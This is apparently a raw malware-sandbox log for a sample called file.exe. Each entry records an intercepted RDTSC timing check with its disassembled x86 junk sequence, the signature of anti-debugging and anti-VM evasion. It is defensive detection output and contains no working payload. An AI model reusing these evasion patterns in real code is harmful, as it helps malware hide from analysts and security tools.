Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3216 second address: CD3234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1BE4ECC073h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3234 second address: CD323E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD323E second address: CD3242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD44BA second address: CD44BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD61B2 second address: CD61B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7609 second address: CD760D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD760D second address: CD7613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6303 second address: CD6308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6308 second address: CD630E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD630E second address: CD631C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD631C second address: CD632F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC06Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD632F second address: CD6335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6335 second address: CD6339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD957 second address: CDD95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2D5 second address: CDD2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2E0 second address: CDD2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD2E4 second address: CDD2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD454 second address: CDD47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CDh 0x00000009 jnl 00007F1BE47673C6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jno 00007F1BE47673CCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD47A second address: CDD486 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE4ECC06Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD486 second address: CDD494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE374A second address: CE374E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE374E second address: CE3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F1BE47673D8h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D4FA second address: C6D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Eh 0x00000008 jmp 00007F1BE4ECC06Fh 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F1BE4ECC06Ch 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D52E second address: C6D534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEBDE0 second address: CEBDE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEBDE6 second address: CEBDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC647 second address: CEC681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 jmp 00007F1BE4ECC077h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE4ECC074h 0x00000013 jng 00007F1BE4ECC066h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC681 second address: CEC698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC82C second address: CEC830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEC830 second address: CEC834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF33D4 second address: CF33DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF33DA second address: CF33DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF200A second address: CF2029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F1BE4ECC06Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F1BE4ECC066h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF23F9 second address: CF23FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2686 second address: CF2690 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE4ECC066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3292 second address: CF329E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF1C98 second address: CF1C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7D89 second address: CF7DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BE47673D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7DA6 second address: CF7DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6BF3 second address: CF6C19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1BE47673D8h 0x00000008 jmp 00007F1BE47673D0h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F1BE47673CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C19 second address: CF6C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1BE4ECC066h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C29 second address: CF6C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CCh 0x00000007 jmp 00007F1BE47673D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C50 second address: CF6C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C55 second address: CF6C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6C5B second address: CF6C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1BE4ECC073h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1073 second address: CC1079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1079 second address: CC107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC15F8 second address: CC160A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16C4 second address: CC16C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16C9 second address: CC16D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16D0 second address: CC16E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F1BE4ECC066h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16E4 second address: CC16F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1BE47673CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC16F2 second address: CC16FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1A09 second address: CC1A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1A0E second address: CC1A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1BE4ECC066h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1B05 second address: CC1B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1EDC second address: CC1F43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1BE4ECC068h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 or edi, dword ptr [ebp+122D3D8Ah] 0x0000002a sub ecx, 425C80C3h 0x00000030 push 0000001Eh 0x00000032 mov ecx, 2BB49F5Eh 0x00000037 nop 0x00000038 jbe 00007F1BE4ECC07Fh 0x0000003e jmp 00007F1BE4ECC079h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push edx 0x00000048 pop edx 0x00000049 pop esi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2203 second address: CC2209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2209 second address: CC220D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC220D second address: CC2211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC2211 second address: CC2231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007F1BE4ECC070h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F33 second address: CF6F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jns 00007F1BE47673C6h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F45 second address: CF6F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jnp 00007F1BE4ECC07Bh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007F1BE4ECC066h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F75 second address: CF6F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1BE47673CFh 0x0000000b jl 00007F1BE47673C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6F93 second address: CF6FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F1BE4ECC066h 0x0000000a jmp 00007F1BE4ECC076h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF6FB3 second address: CF6FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7255 second address: CF7288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1BE4ECC066h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F1BE4ECC06Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73F9 second address: CF73FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF73FF second address: CF7405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7405 second address: CF7409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77D9 second address: CF77DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77DD second address: CF77F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1BE47673ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F1BE47673C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF77F1 second address: CF7809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC074h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFF30 second address: CFFF6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D1h 0x00000007 jmp 00007F1BE47673D3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F1BE47673D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0709C second address: D070BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BE4ECC06Ch 0x0000000b pop edx 0x0000000c je 00007F1BE4ECC07Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F1BE4ECC066h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D070BF second address: D070C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7AA09 second address: C7AA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06905 second address: D0690A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0690A second address: D06932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BE4ECC077h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F1BE4ECC066h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06932 second address: D06936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06936 second address: D0693A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0693A second address: D06940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A75 second address: D06A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A8D second address: D06A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A91 second address: D06A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06A97 second address: D06AAA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE47673CEh 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F1BE47673C6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06BD1 second address: D06BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BE4ECC066h 0x0000000a jno 00007F1BE4ECC066h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06D7F second address: D06D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06D96 second address: D06D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D095E5 second address: D095FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BE47673CFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D095FA second address: D0960B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F1BE4ECC066h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0915A second address: D09160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09160 second address: D09166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09166 second address: D0916B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0916B second address: D09175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092CD second address: D092D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092D3 second address: D092D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092D7 second address: D092DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D092DB second address: D092F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F1BE4ECC06Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D947 second address: D0D97D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F1BE47673D0h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F1BE47673CAh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jg 00007F1BE47673C6h 0x00000025 popad 0x00000026 rdtsc
